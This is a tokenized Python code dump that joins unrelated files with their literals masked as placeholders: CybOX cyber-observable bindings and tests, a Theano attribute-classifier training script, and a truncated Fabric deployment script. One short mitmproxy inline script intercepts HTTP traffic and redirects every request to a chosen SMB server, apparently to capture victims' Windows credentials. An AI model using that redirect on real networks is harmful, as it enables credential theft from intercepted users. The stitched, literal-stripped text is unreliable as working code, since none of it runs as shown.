ByteRunType , <EOL> '<STR_LIT>' : cybox_common . IntegerObjectPropertyType , <EOL> '<STR_LIT>' : cybox_common . IntegerObjectPropertyType , <EOL> '<STR_LIT>' : cybox_common . ImportsType , <EOL> '<STR_LIT>' : cybox_common . NonNegativeIntegerObjectPropertyType , <EOL> '<STR_LIT>' : cybox_common . LibraryType , <EOL> '<STR_LIT>' : cybox_common . ToolReferencesType , <EOL> '<STR_LIT>' : cybox_common . DateTimeWithPrecisionType , <EOL> '<STR_LIT>' : cybox_common . HashValueType , <EOL> '<STR_LIT>' : cybox_common . ConfigurationSettingType , <EOL> '<STR_LIT>' : cybox_common . LocationType , <EOL> '<STR_LIT>' : cybox_common . LibrariesType , <EOL> '<STR_LIT>' : cybox_common . StringObjectPropertyType , <EOL> '<STR_LIT>' : cybox_common . StringObjectPropertyType , <EOL> '<STR_LIT>' : cybox_common . StructuredTextType , <EOL> '<STR_LIT>' : cybox_common . ObjectPropertiesType , <EOL> '<STR_LIT>' : cybox_common . BuildConfigurationType , <EOL> '<STR_LIT>' : cybox_common . HexBinaryObjectPropertyType , <EOL> '<STR_LIT>' : cybox_common . IntegerObjectPropertyType , <EOL> '<STR_LIT>' : cybox_common . HashSegmentType , <EOL> '<STR_LIT>' : cybox_common . StringObjectPropertyType , <EOL> '<STR_LIT:Name>' : cybox_common . StringObjectPropertyType , <EOL> '<STR_LIT>' : cybox_common . StringObjectPropertyType , <EOL> '<STR_LIT>' : cybox_common . IntegerObjectPropertyType , <EOL> '<STR_LIT>' : cybox_common . PlatformSpecificationType , <EOL> '<STR_LIT>' : cybox_common . FuzzyHashValueType , <EOL> '<STR_LIT>' : cybox_common . DataSizeType , <EOL> '<STR_LIT>' : cybox_common . StructuredTextType , <EOL> '<STR_LIT>' : cybox_common . DateTimeWithPrecisionType , <EOL> '<STR_LIT>' : cybox_common . ContributorType , <EOL> '<STR_LIT>' : cybox_common . ToolsInformationType , <EOL> '<STR_LIT>' : cybox_common . ToolInformationType , <EOL> } <EOL> USAGE_TEXT = """<STR_LIT>""" <EOL> def usage ( ) : <EOL> print ( USAGE_TEXT ) <EOL> sys . 
exit ( <NUM_LIT:1> ) <EOL> def get_root_tag ( node ) : <EOL> tag = Tag_pattern_ . match ( node . tag ) . groups ( ) [ - <NUM_LIT:1> ] <EOL> rootClass = GDSClassesMapping . get ( tag ) <EOL> if rootClass is None : <EOL> rootClass = globals ( ) . get ( tag ) <EOL> return tag , rootClass <EOL> def parse ( inFileName ) : <EOL> doc = parsexml_ ( inFileName ) <EOL> rootNode = doc . getroot ( ) <EOL> rootTag , rootClass = get_root_tag ( rootNode ) <EOL> if rootClass is None : <EOL> rootTag = '<STR_LIT>' <EOL> rootClass = ASObjectType <EOL> rootObj = rootClass . factory ( ) <EOL> rootObj . build ( rootNode ) <EOL> doc = None <EOL> sys . stdout . write ( '<STR_LIT>' ) <EOL> rootObj . export ( sys . stdout . write , <NUM_LIT:0> , name_ = rootTag , <EOL> namespacedef_ = '<STR_LIT>' , <EOL> pretty_print = True ) <EOL> return rootObj <EOL> def parseEtree ( inFileName ) : <EOL> doc = parsexml_ ( inFileName ) <EOL> rootNode = doc . getroot ( ) <EOL> rootTag , rootClass = get_root_tag ( rootNode ) <EOL> if rootClass is None : <EOL> rootTag = '<STR_LIT>' <EOL> rootClass = ASObjectType <EOL> rootObj = rootClass . factory ( ) <EOL> rootObj . build ( rootNode ) <EOL> doc = None <EOL> rootElement = rootObj . to_etree ( None , name_ = rootTag ) <EOL> content = etree_ . tostring ( rootElement , pretty_print = True , <EOL> xml_declaration = True , encoding = "<STR_LIT:utf-8>" ) <EOL> sys . stdout . write ( content ) <EOL> sys . stdout . write ( '<STR_LIT:\n>' ) <EOL> return rootObj , rootElement <EOL> def parseString ( inString ) : <EOL> from mixbox . vendor . six import StringIO <EOL> doc = parsexml_ ( StringIO ( inString ) ) <EOL> rootNode = doc . getroot ( ) <EOL> rootTag , rootClass = get_root_tag ( rootNode ) <EOL> if rootClass is None : <EOL> rootTag = '<STR_LIT>' <EOL> rootClass = ASObjectType <EOL> rootObj = rootClass . factory ( ) <EOL> rootObj . build ( rootNode ) <EOL> doc = None <EOL> sys . stdout . write ( '<STR_LIT>' ) <EOL> rootObj . export ( sys . stdout . 
write , <NUM_LIT:0> , name_ = "<STR_LIT>" , <EOL> namespacedef_ = '<STR_LIT>' ) <EOL> return rootObj <EOL> def main ( ) : <EOL> args = sys . argv [ <NUM_LIT:1> : ] <EOL> if len ( args ) == <NUM_LIT:1> : <EOL> parse ( args [ <NUM_LIT:0> ] ) <EOL> else : <EOL> usage ( ) <EOL> if __name__ == '<STR_LIT:__main__>' : <EOL> main ( ) <EOL> __all__ = [ <EOL> "<STR_LIT>" ] </s>
<s> from mixbox import entities <EOL> from mixbox import fields <EOL> import cybox . bindings . http_session_object as http_session_binding <EOL> from cybox . objects . uri_object import URI <EOL> from cybox . objects . address_object import EmailAddress <EOL> from cybox . objects . port_object import Port <EOL> from cybox . common import ObjectProperties , String , DateTime , PositiveInteger , Integer <EOL> class HTTPRequestLine ( entities . Entity ) : <EOL> _binding = http_session_binding <EOL> _binding_class = http_session_binding . HTTPRequestLineType <EOL> _namespace = "<STR_LIT>" <EOL> http_method = fields . TypedField ( "<STR_LIT>" , String ) <EOL> value = fields . TypedField ( "<STR_LIT>" , String ) <EOL> version = fields . TypedField ( "<STR_LIT>" , String ) <EOL> class HostField ( entities . Entity ) : <EOL> _binding = http_session_binding <EOL> _binding_class = http_session_binding . HostFieldType <EOL> _namespace = "<STR_LIT>" <EOL> domain_name = fields . TypedField ( "<STR_LIT>" , URI ) <EOL> port = fields . TypedField ( "<STR_LIT>" , Port ) <EOL> class HTTPRequestHeaderFields ( entities . Entity ) : <EOL> _binding = http_session_binding <EOL> _binding_class = http_session_binding . HTTPRequestHeaderFieldsType <EOL> _namespace = "<STR_LIT>" <EOL> accept = fields . TypedField ( "<STR_LIT>" , String ) <EOL> accept_charset = fields . TypedField ( "<STR_LIT>" , String ) <EOL> accept_language = fields . TypedField ( "<STR_LIT>" , String ) <EOL> accept_datetime = fields . TypedField ( "<STR_LIT>" , String ) <EOL> accept_encoding = fields . TypedField ( "<STR_LIT>" , String ) <EOL> authorization = fields . TypedField ( "<STR_LIT>" , String ) <EOL> cache_control = fields . TypedField ( "<STR_LIT>" , String ) <EOL> connection = fields . TypedField ( "<STR_LIT>" , String ) <EOL> cookie = fields . TypedField ( "<STR_LIT>" , String ) <EOL> content_length = fields . TypedField ( "<STR_LIT>" , Integer ) <EOL> content_md5 = fields . 
TypedField ( "<STR_LIT>" , String ) <EOL> content_type = fields . TypedField ( "<STR_LIT>" , String ) <EOL> date = fields . TypedField ( "<STR_LIT>" , DateTime ) <EOL> expect = fields . TypedField ( "<STR_LIT>" , String ) <EOL> from_ = fields . TypedField ( "<STR_LIT>" , EmailAddress ) <EOL> host = fields . TypedField ( "<STR_LIT>" , HostField ) <EOL> if_match = fields . TypedField ( "<STR_LIT>" , String ) <EOL> if_modified_since = fields . TypedField ( "<STR_LIT>" , DateTime ) <EOL> if_none_match = fields . TypedField ( "<STR_LIT>" , String ) <EOL> if_range = fields . TypedField ( "<STR_LIT>" , String ) <EOL> if_unmodified_since = fields . TypedField ( "<STR_LIT>" , DateTime ) <EOL> max_forwards = fields . TypedField ( "<STR_LIT>" , Integer ) <EOL> pragma = fields . TypedField ( "<STR_LIT>" , String ) <EOL> proxy_authorization = fields . TypedField ( "<STR_LIT>" , String ) <EOL> range_ = fields . TypedField ( "<STR_LIT>" , String ) <EOL> referer = fields . TypedField ( "<STR_LIT>" , URI ) <EOL> te = fields . TypedField ( "<STR_LIT>" , String ) <EOL> user_agent = fields . TypedField ( "<STR_LIT>" , String ) <EOL> via = fields . TypedField ( "<STR_LIT>" , String ) <EOL> warning = fields . TypedField ( "<STR_LIT>" , String ) <EOL> dnt = fields . TypedField ( "<STR_LIT>" , String ) <EOL> x_requested_with = fields . TypedField ( "<STR_LIT>" , String ) <EOL> x_forwarded_for = fields . TypedField ( "<STR_LIT>" , String ) <EOL> x_forwarded_proto = fields . TypedField ( "<STR_LIT>" , String ) <EOL> x_att_deviceid = fields . TypedField ( "<STR_LIT>" , String ) <EOL> x_wap_profile = fields . TypedField ( "<STR_LIT>" , URI ) <EOL> class HTTPRequestHeader ( entities . Entity ) : <EOL> _binding = http_session_binding <EOL> _binding_class = http_session_binding . HTTPRequestHeaderType <EOL> _namespace = "<STR_LIT>" <EOL> raw_header = fields . TypedField ( "<STR_LIT>" , String ) <EOL> parsed_header = fields . 
TypedField ( "<STR_LIT>" , HTTPRequestHeaderFields ) <EOL> class HTTPMessage ( entities . Entity ) : <EOL> _binding = http_session_binding <EOL> _binding_class = http_session_binding . HTTPMessageType <EOL> _namespace = "<STR_LIT>" <EOL> length = fields . TypedField ( "<STR_LIT>" , PositiveInteger ) <EOL> message_body = fields . TypedField ( "<STR_LIT>" , String ) <EOL> class HTTPClientRequest ( entities . Entity ) : <EOL> _binding = http_session_binding <EOL> _binding_class = http_session_binding . HTTPClientRequestType <EOL> _namespace = "<STR_LIT>" <EOL> http_request_line = fields . TypedField ( "<STR_LIT>" , HTTPRequestLine ) <EOL> http_request_header = fields . TypedField ( "<STR_LIT>" , <EOL> HTTPRequestHeader ) <EOL> http_message_body = fields . TypedField ( "<STR_LIT>" , HTTPMessage ) <EOL> class HTTPStatusLine ( entities . Entity ) : <EOL> _binding = http_session_binding <EOL> _binding_class = http_session_binding . HTTPStatusLineType <EOL> _namespace = "<STR_LIT>" <EOL> version = fields . TypedField ( "<STR_LIT>" , String ) <EOL> status_code = fields . TypedField ( "<STR_LIT>" , PositiveInteger ) <EOL> reason_phrase = fields . TypedField ( "<STR_LIT>" , String ) <EOL> class HTTPResponseHeaderFields ( entities . Entity ) : <EOL> _binding = http_session_binding <EOL> _binding_class = http_session_binding . HTTPResponseHeaderFieldsType <EOL> _namespace = "<STR_LIT>" <EOL> access_control_allow_origin = fields . TypedField ( "<STR_LIT>" , String ) <EOL> accept_ranges = fields . TypedField ( "<STR_LIT>" , String ) <EOL> age = fields . TypedField ( "<STR_LIT>" , Integer ) <EOL> cache_control = fields . TypedField ( "<STR_LIT>" , String ) <EOL> connection = fields . TypedField ( "<STR_LIT>" , String ) <EOL> content_encoding = fields . TypedField ( "<STR_LIT>" , String ) <EOL> content_language = fields . TypedField ( "<STR_LIT>" , String ) <EOL> content_length = fields . TypedField ( "<STR_LIT>" , Integer ) <EOL> content_location = fields . 
TypedField ( "<STR_LIT>" , String ) <EOL> content_md5 = fields . TypedField ( "<STR_LIT>" , String ) <EOL> content_disposition = fields . TypedField ( "<STR_LIT>" , String ) <EOL> content_range = fields . TypedField ( "<STR_LIT>" , String ) <EOL> content_type = fields . TypedField ( "<STR_LIT>" , String ) <EOL> date = fields . TypedField ( "<STR_LIT>" , DateTime ) <EOL> etag = fields . TypedField ( "<STR_LIT>" , String ) <EOL> expires = fields . TypedField ( "<STR_LIT>" , DateTime ) <EOL> last_modified = fields . TypedField ( "<STR_LIT>" , DateTime ) <EOL> link = fields . TypedField ( "<STR_LIT>" , String ) <EOL> location = fields . TypedField ( "<STR_LIT>" , URI ) <EOL> p3p = fields . TypedField ( "<STR_LIT>" , String ) <EOL> pragma = fields . TypedField ( "<STR_LIT>" , String ) <EOL> proxy_authenticate = fields . TypedField ( "<STR_LIT>" , String ) <EOL> refresh = fields . TypedField ( "<STR_LIT>" , String ) <EOL> retry_after = fields . TypedField ( "<STR_LIT>" , Integer ) <EOL> server = fields . TypedField ( "<STR_LIT>" , String ) <EOL> set_cookie = fields . TypedField ( "<STR_LIT>" , String ) <EOL> strict_transport_security = fields . TypedField ( "<STR_LIT>" , <EOL> String ) <EOL> trailer = fields . TypedField ( "<STR_LIT>" , String ) <EOL> transfer_encoding = fields . TypedField ( "<STR_LIT>" , String ) <EOL> vary = fields . TypedField ( "<STR_LIT>" , String ) <EOL> via = fields . TypedField ( "<STR_LIT>" , String ) <EOL> warning = fields . TypedField ( "<STR_LIT>" , String ) <EOL> www_authenticate = fields . TypedField ( "<STR_LIT>" , String ) <EOL> x_frame_options = fields . TypedField ( "<STR_LIT>" , String ) <EOL> x_xss_protection = fields . TypedField ( "<STR_LIT>" , String ) <EOL> x_content_type_options = fields . TypedField ( "<STR_LIT>" , String ) <EOL> x_powered_by = fields . TypedField ( "<STR_LIT>" , String ) <EOL> x_ua_compatible = fields . TypedField ( "<STR_LIT>" , String ) <EOL> class HTTPResponseHeader ( entities . 
Entity ) : <EOL> _binding = http_session_binding <EOL> _binding_class = http_session_binding . HTTPResponseHeaderType <EOL> _namespace = "<STR_LIT>" <EOL> raw_header = fields . TypedField ( "<STR_LIT>" , String ) <EOL> parsed_header = fields . TypedField ( "<STR_LIT>" , HTTPResponseHeaderFields ) <EOL> class HTTPServerResponse ( entities . Entity ) : <EOL> _binding = http_session_binding <EOL> _binding_class = http_session_binding . HTTPServerResponseType <EOL> _namespace = "<STR_LIT>" <EOL> http_status_line = fields . TypedField ( "<STR_LIT>" , HTTPStatusLine ) <EOL> http_response_header = fields . TypedField ( "<STR_LIT>" , <EOL> HTTPResponseHeader ) <EOL> http_message_body = fields . TypedField ( "<STR_LIT>" , HTTPMessage ) <EOL> class HTTPRequestResponse ( entities . Entity ) : <EOL> _binding = http_session_binding <EOL> _binding_class = http_session_binding . HTTPRequestResponseType <EOL> _namespace = "<STR_LIT>" <EOL> ordinal_position = fields . TypedField ( "<STR_LIT>" ) <EOL> http_client_request = fields . TypedField ( "<STR_LIT>" , HTTPClientRequest ) <EOL> http_provisional_server_response = fields . TypedField ( "<STR_LIT>" , HTTPServerResponse ) <EOL> http_server_response = fields . TypedField ( "<STR_LIT>" , HTTPServerResponse ) <EOL> class HTTPSession ( ObjectProperties ) : <EOL> _binding = http_session_binding <EOL> _binding_class = http_session_binding . HTTPSessionObjectType <EOL> _namespace = "<STR_LIT>" <EOL> _XSI_NS = "<STR_LIT>" <EOL> _XSI_TYPE = "<STR_LIT>" <EOL> http_request_response = fields . TypedField ( "<STR_LIT>" , <EOL> HTTPRequestResponse , <EOL> multiple = True ) </s>
<s> from mixbox import fields <EOL> import cybox . bindings . win_critical_section_object as win_critical_section_binding <EOL> from cybox . common import ObjectProperties , HexBinary , NonNegativeInteger <EOL> class WinCriticalSection ( ObjectProperties ) : <EOL> _binding = win_critical_section_binding <EOL> _binding_class = win_critical_section_binding . WindowsCriticalSectionObjectType <EOL> _namespace = '<STR_LIT>' <EOL> _XSI_NS = "<STR_LIT>" <EOL> _XSI_TYPE = "<STR_LIT>" <EOL> address = fields . TypedField ( "<STR_LIT>" , HexBinary ) <EOL> spin_count = fields . TypedField ( "<STR_LIT>" , NonNegativeInteger ) </s>
<s> from mixbox import fields <EOL> import cybox . bindings . win_waitable_timer_object as win_waitable_timer_binding <EOL> from cybox . common import String , ObjectProperties <EOL> class WinWaitableTimer ( ObjectProperties ) : <EOL> _binding = win_waitable_timer_binding <EOL> _binding_class = win_waitable_timer_binding . WindowsWaitableTimerObjectType <EOL> _namespace = "<STR_LIT>" <EOL> _XSI_NS = "<STR_LIT>" <EOL> _XSI_TYPE = "<STR_LIT>" <EOL> security_attributes = fields . TypedField ( "<STR_LIT>" , String ) <EOL> name = fields . TypedField ( "<STR_LIT:Name>" , String ) <EOL> type_ = fields . TypedField ( "<STR_LIT>" , String ) </s>
<s> """<STR_LIT>""" <EOL> import unittest <EOL> from mixbox . vendor . six import StringIO <EOL> class CIQAddressTests ( unittest . TestCase ) : <EOL> def test_can_load_ciq_extension ( self ) : <EOL> from cybox . bindings . extensions . location import ciq_address_3_0 <EOL> addr = ciq_address_3_0 . CIQAddress3_0InstanceType ( ) <EOL> s = StringIO ( ) <EOL> addr . export ( s . write , <NUM_LIT:0> ) <EOL> xml = s . getvalue ( ) <EOL> self . assertEqual ( <NUM_LIT> , len ( xml ) ) <EOL> if __name__ == "<STR_LIT:__main__>" : <EOL> unittest . main ( ) </s>
<s> import unittest <EOL> from mixbox . vendor . six import u <EOL> from cybox . objects . network_route_object import NetRoute <EOL> from cybox . test import EntityTestCase , round_trip <EOL> from cybox . test . objects import ObjectTestCase <EOL> class TestNetworkRoute ( ObjectTestCase , unittest . TestCase ) : <EOL> object_type = "<STR_LIT>" <EOL> klass = NetRoute <EOL> _full_dict = { <EOL> '<STR_LIT>' : False , <EOL> '<STR_LIT>' : True , <EOL> '<STR_LIT>' : False , <EOL> '<STR_LIT>' : False , <EOL> '<STR_LIT>' : True , <EOL> '<STR_LIT:description>' : "<STR_LIT>" , <EOL> '<STR_LIT>' : u ( "<STR_LIT>" ) , <EOL> '<STR_LIT>' : u ( "<STR_LIT>" ) , <EOL> '<STR_LIT>' : u ( "<STR_LIT>" ) , <EOL> '<STR_LIT>' : object_type , <EOL> } <EOL> if __name__ == "<STR_LIT:__main__>" : <EOL> unittest . main ( ) </s>
<s> import unittest <EOL> from mixbox . vendor . six import u <EOL> from cybox . objects . win_pipe_object import WinPipe <EOL> from cybox . test . objects import ObjectTestCase <EOL> class TestWinPipe ( ObjectTestCase , unittest . TestCase ) : <EOL> object_type = "<STR_LIT>" <EOL> klass = WinPipe <EOL> _full_dict = { <EOL> '<STR_LIT:name>' : u ( "<STR_LIT>" ) , <EOL> '<STR_LIT>' : True , <EOL> '<STR_LIT>' : <NUM_LIT:30> , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:type>' : u ( "<STR_LIT>" ) , <EOL> '<STR_LIT>' : <NUM_LIT> , <EOL> '<STR_LIT>' : <NUM_LIT> , <EOL> '<STR_LIT>' : <NUM_LIT:3> , <EOL> '<STR_LIT>' : "<STR_LIT>" , <EOL> } , <EOL> '<STR_LIT>' : <NUM_LIT> , <EOL> '<STR_LIT>' : <NUM_LIT:10> , <EOL> '<STR_LIT>' : "<STR_LIT>" , <EOL> '<STR_LIT>' : <NUM_LIT> , <EOL> '<STR_LIT>' : "<STR_LIT>" , <EOL> '<STR_LIT>' : u ( "<STR_LIT>" ) , <EOL> '<STR_LIT>' : object_type , <EOL> } <EOL> if __name__ == "<STR_LIT:__main__>" : <EOL> unittest . main ( ) </s>
<s> from libmproxy . protocol . http import HTTPResponse <EOL> from netlib . odict import ODictCaseless <EOL> """<STR_LIT>""" <EOL> def start ( context , argv ) : <EOL> if len ( argv ) != <NUM_LIT:2> and len ( argv ) != <NUM_LIT:3> : <EOL> raise ValueError ( '<STR_LIT>' ) <EOL> context . smbserver_ip = argv [ <NUM_LIT:1> ] <EOL> if len ( argv ) == <NUM_LIT:3> : <EOL> context . identifier = argv [ <NUM_LIT:2> ] <EOL> else : <EOL> context . identifier = "<STR_LIT>" <EOL> def request ( context , flow ) : <EOL> should_redirect = True <EOL> if should_redirect is not None and should_redirect : <EOL> resp = HTTPResponse ( <EOL> [ <NUM_LIT:1> , <NUM_LIT:1> ] , <EOL> <NUM_LIT> , <EOL> "<STR_LIT>" , <EOL> ODictCaseless ( [ [ "<STR_LIT:Content-Type>" , "<STR_LIT>" ] , [ "<STR_LIT>" , "<STR_LIT>" . format ( context . smbserver_ip , <EOL> context . identifier ) ] ] ) , <EOL> "<STR_LIT>" ) <EOL> flow . reply ( resp ) </s>
<s> import os <EOL> import sys <EOL> import argparse <EOL> import numpy as np <EOL> import theano . tensor as T <EOL> homepath = os . path . join ( '<STR_LIT:..>' , '<STR_LIT:..>' ) <EOL> if not homepath in sys . path : <EOL> sys . path . insert ( <NUM_LIT:0> , homepath ) <EOL> from dlearn . models . layer import FullConnLayer , ConvPoolLayer <EOL> from dlearn . models . nnet import NeuralNet <EOL> from dlearn . utils import actfuncs , costfuncs <EOL> from dlearn . utils . serialize import load_data , save_data <EOL> from dlearn . optimization import sgd <EOL> desctxt = """<STR_LIT>""" <EOL> dataset_txt = """<STR_LIT>""" <EOL> attr_txt = """<STR_LIT>""" <EOL> seg_txt = """<STR_LIT>""" <EOL> output_txt = """<STR_LIT>""" <EOL> parser = argparse . ArgumentParser ( description = desctxt ) <EOL> parser . add_argument ( '<STR_LIT>' , '<STR_LIT>' , nargs = <NUM_LIT:1> , required = True , <EOL> metavar = '<STR_LIT:name>' , help = dataset_txt ) <EOL> parser . add_argument ( '<STR_LIT>' , '<STR_LIT>' , nargs = <NUM_LIT:1> , required = True , <EOL> metavar = '<STR_LIT:name>' , help = attr_txt ) <EOL> parser . add_argument ( '<STR_LIT>' , '<STR_LIT>' , nargs = <NUM_LIT:1> , required = True , <EOL> metavar = '<STR_LIT:name>' , help = seg_txt ) <EOL> parser . add_argument ( '<STR_LIT>' , '<STR_LIT>' , nargs = '<STR_LIT:?>' , default = None , <EOL> metavar = '<STR_LIT:name>' , help = output_txt ) <EOL> args = parser . parse_args ( ) <EOL> def train_model ( dataset , attr_model , seg_model ) : <EOL> def shape_constrained_pooling ( fmaps ) : <EOL> s = fmaps . sum ( axis = [ <NUM_LIT:2> , <NUM_LIT:3> ] ) <EOL> Z = abs ( actfuncs . tanh ( fmaps ) ) . sum ( axis = [ <NUM_LIT:2> , <NUM_LIT:3> ] ) <EOL> return s / Z <EOL> X = T . tensor4 ( ) <EOL> A = T . matrix ( ) <EOL> feature_layers = [ ] <EOL> feature_layers . 
append ( ConvPoolLayer ( <EOL> input = X , <EOL> input_shape = ( <NUM_LIT:3> , <NUM_LIT> , <NUM_LIT> ) , <EOL> filter_shape = ( <NUM_LIT:32> , <NUM_LIT:3> , <NUM_LIT:5> , <NUM_LIT:5> ) , <EOL> pool_shape = ( <NUM_LIT:2> , <NUM_LIT:2> ) , <EOL> active_func = actfuncs . tanh , <EOL> flatten = False , <EOL> W = attr_model . blocks [ <NUM_LIT:0> ] . _W , <EOL> b = <NUM_LIT:0.0> <EOL> ) ) <EOL> feature_layers . append ( ConvPoolLayer ( <EOL> input = feature_layers [ - <NUM_LIT:1> ] . output , <EOL> input_shape = feature_layers [ - <NUM_LIT:1> ] . output_shape , <EOL> filter_shape = ( <NUM_LIT:64> , <NUM_LIT:32> , <NUM_LIT:5> , <NUM_LIT:5> ) , <EOL> pool_shape = ( <NUM_LIT:2> , <NUM_LIT:2> ) , <EOL> active_func = actfuncs . tanh , <EOL> flatten = False , <EOL> W = attr_model . blocks [ <NUM_LIT:1> ] . _W , <EOL> b = <NUM_LIT:0.0> <EOL> ) ) <EOL> seg_layers = [ ] <EOL> seg_layers . append ( FullConnLayer ( <EOL> input = feature_layers [ - <NUM_LIT:1> ] . output . flatten ( <NUM_LIT:2> ) , <EOL> input_shape = np . prod ( feature_layers [ - <NUM_LIT:1> ] . output_shape ) , <EOL> output_shape = <NUM_LIT> , <EOL> dropout_ratio = <NUM_LIT:0.1> , <EOL> active_func = actfuncs . tanh , <EOL> W = seg_model . blocks [ <NUM_LIT:2> ] . _W , <EOL> b = seg_model . blocks [ <NUM_LIT:2> ] . _b <EOL> ) ) <EOL> seg_layers . append ( FullConnLayer ( <EOL> input = seg_layers [ - <NUM_LIT:1> ] . output , <EOL> input_shape = seg_layers [ - <NUM_LIT:1> ] . output_shape , <EOL> output_shape = <NUM_LIT> * <NUM_LIT> , <EOL> dropout_input = seg_layers [ - <NUM_LIT:1> ] . dropout_output , <EOL> active_func = actfuncs . sigmoid , <EOL> W = seg_model . blocks [ <NUM_LIT:3> ] . _W , <EOL> b = seg_model . blocks [ <NUM_LIT:3> ] . _b <EOL> ) ) <EOL> S = seg_layers [ - <NUM_LIT:1> ] . output <EOL> S = S * ( S >= <NUM_LIT:0.1> ) <EOL> S = S . reshape ( ( S . shape [ <NUM_LIT:0> ] , <NUM_LIT> , <NUM_LIT> ) ) <EOL> S = S . 
dimshuffle ( <NUM_LIT:0> , '<STR_LIT:x>' , <NUM_LIT:1> , <NUM_LIT:2> ) <EOL> S_dropout = seg_layers [ - <NUM_LIT:1> ] . dropout_output <EOL> S_dropout = S_dropout * ( S_dropout >= <NUM_LIT:0.1> ) <EOL> S_dropout = S_dropout . reshape ( ( S_dropout . shape [ <NUM_LIT:0> ] , <NUM_LIT> , <NUM_LIT> ) ) <EOL> S_dropout = S_dropout . dimshuffle ( <NUM_LIT:0> , '<STR_LIT:x>' , <NUM_LIT:1> , <NUM_LIT:2> ) <EOL> attr_layers = [ ] <EOL> '''<STR_LIT>''' <EOL> attr_layers . append ( FullConnLayer ( <EOL> input = shape_constrained_pooling ( feature_layers [ - <NUM_LIT:1> ] . output * S ) , <EOL> input_shape = feature_layers [ - <NUM_LIT:1> ] . output_shape , <EOL> output_shape = <NUM_LIT:64> , <EOL> dropout_input = shape_constrained_pooling ( <EOL> feature_layers [ - <NUM_LIT:1> ] . dropout_output * S_dropout ) , <EOL> dropout_ratio = <NUM_LIT:0.1> , <EOL> active_func = actfuncs . tanh , <EOL> W = attr_model . blocks [ <NUM_LIT:2> ] . _W , <EOL> b = attr_model . blocks [ <NUM_LIT:2> ] . _b <EOL> ) ) <EOL> attr_layers . append ( FullConnLayer ( <EOL> input = attr_layers [ - <NUM_LIT:1> ] . output , <EOL> input_shape = attr_layers [ - <NUM_LIT:1> ] . output_shape , <EOL> output_shape = <NUM_LIT:11> , <EOL> dropout_input = attr_layers [ - <NUM_LIT:1> ] . dropout_output , <EOL> active_func = actfuncs . sigmoid , <EOL> W = attr_model . blocks [ <NUM_LIT:3> ] . _W , <EOL> b = attr_model . blocks [ <NUM_LIT:3> ] . _b <EOL> ) ) <EOL> model = NeuralNet ( feature_layers + seg_layers + attr_layers , <EOL> X , attr_layers [ - <NUM_LIT:1> ] . output ) <EOL> model . target = A <EOL> model . cost = costfuncs . binxent ( attr_layers [ - <NUM_LIT:1> ] . dropout_output , A ) + <NUM_LIT> * model . get_norm ( <NUM_LIT:2> ) <EOL> model . error = costfuncs . binerr ( attr_layers [ - <NUM_LIT:1> ] . output , A ) <EOL> sgd . 
train ( model , dataset , lr = <NUM_LIT> , momentum = <NUM_LIT> , <EOL> batch_size = <NUM_LIT:100> , n_epochs = <NUM_LIT> , <EOL> epoch_waiting = <NUM_LIT:10> ) <EOL> return model <EOL> if __name__ == '<STR_LIT:__main__>' : <EOL> dataset_file = '<STR_LIT>' . format ( args . dataset [ <NUM_LIT:0> ] ) <EOL> attr_file = '<STR_LIT>' . format ( args . attribute [ <NUM_LIT:0> ] ) <EOL> seg_file = '<STR_LIT>' . format ( args . segmentation [ <NUM_LIT:0> ] ) <EOL> out_file = '<STR_LIT>' if args . output is None else '<STR_LIT>' . format ( args . output ) <EOL> dataset = load_data ( dataset_file ) <EOL> attr_model = load_data ( attr_file ) <EOL> seg_model = load_data ( seg_file ) <EOL> model = train_model ( dataset , attr_model , seg_model ) <EOL> save_data ( model , out_file ) </s>
<s> from copy import copy <EOL> from datetime import datetime <EOL> from os . path import basename , abspath , dirname , isfile , join <EOL> from fabric . api import env , puts , abort , cd , hide , task <EOL> from fabric . operations import sudo , settings , run <EOL> from fabric . contrib import console <EOL> from fabric . contrib . files import upload_template <EOL> from fabric . colors import _wrap_with , green <EOL> green_bg = _wrap_with ( '<STR_LIT>' ) <EOL> red_bg = _wrap_with ( '<STR_LIT>' ) <EOL> fagungis_path = dirname ( abspath ( __file__ ) ) <EOL> @ task <EOL> def setup ( ) : <EOL> if not test_configuration ( ) : <EOL> if not console . confirm ( "<STR_LIT>" % red_bg ( '<STR_LIT>' ) , default = False ) : <EOL> abort ( "<STR_LIT>" ) <EOL> if env . ask_confirmation : <EOL> if not console . confirm ( "<STR_LIT>" % red_bg ( env . project . upper ( ) ) , default = False ) : <EOL> abort ( "<STR_LIT>" ) <EOL> puts ( green_bg ( '<STR_LIT>' ) ) <EOL> start_time = datetime . now ( ) <EOL> _verify_sudo <EOL> _install_dependencies ( ) <EOL> _create_django_user ( ) <EOL> _setup_directories ( ) <EOL> _hg_clone ( ) <EOL> _install_virtualenv ( ) <EOL> _create_virtualenv ( ) <EOL> _install_gunicorn ( ) <EOL> _install_requirements ( ) <EOL> _upload_nginx_conf ( ) <EOL> _upload_rungunicorn_script ( ) <EOL> _upload_supervisord_conf ( ) <EOL> end_time = datetime . now ( ) <EOL> finish_message = '<STR_LIT>' % ( green_bg ( end_time . strftime ( '<STR_LIT>' ) ) , ( end_time - start_time ) . seconds ) <EOL> puts ( finish_message ) <EOL> @ task <EOL> def deploy ( ) : <EOL> if not test_configuration ( ) : <EOL> if not console . confirm ( "<STR_LIT>" % red_bg ( '<STR_LIT>' ) , default = False ) : <EOL> abort ( "<STR_LIT>" ) <EOL> _verify_sudo ( ) <EOL> if env . ask_confirmation : <EOL> if not console . confirm ( "<STR_LIT>" % red_bg ( env . project . upper ( ) ) , default = False ) : <EOL> abort ( "<STR_LIT>" ) <EOL> puts ( green_bg ( '<STR_LIT>' ) ) <EOL> start_time = datetime . 
now ( ) <EOL> hg_pull ( ) <EOL> _install_requirements ( ) <EOL> _upload_nginx_conf ( ) <EOL> _upload_rungunicorn_script ( ) <EOL> _upload_supervisord_conf ( ) <EOL> _prepare_django_project ( ) <EOL> _prepare_media_path ( ) <EOL> _supervisor_restart ( ) <EOL> end_time = datetime . now ( ) <EOL> finish_message = '<STR_LIT>' % ( green_bg ( end_time . strftime ( '<STR_LIT>' ) ) , ( end_time - start_time ) . seconds ) <EOL> puts ( finish_message ) <EOL> @ task <EOL> def hg_pull ( ) : <EOL> with cd ( env . code_root ) : <EOL> sudo ( '<STR_LIT>' ) <EOL> @ task <EOL> def test_configuration ( verbose = True ) : <EOL> errors = [ ] <EOL> parameters_info = [ ] <EOL> if '<STR_LIT>' not in env or not env . project : <EOL> errors . append ( '<STR_LIT>' ) <EOL> elif verbose : <EOL> parameters_info . append ( ( '<STR_LIT>' , env . project ) ) <EOL> if '<STR_LIT>' not in env or not env . repository : <EOL> errors . append ( 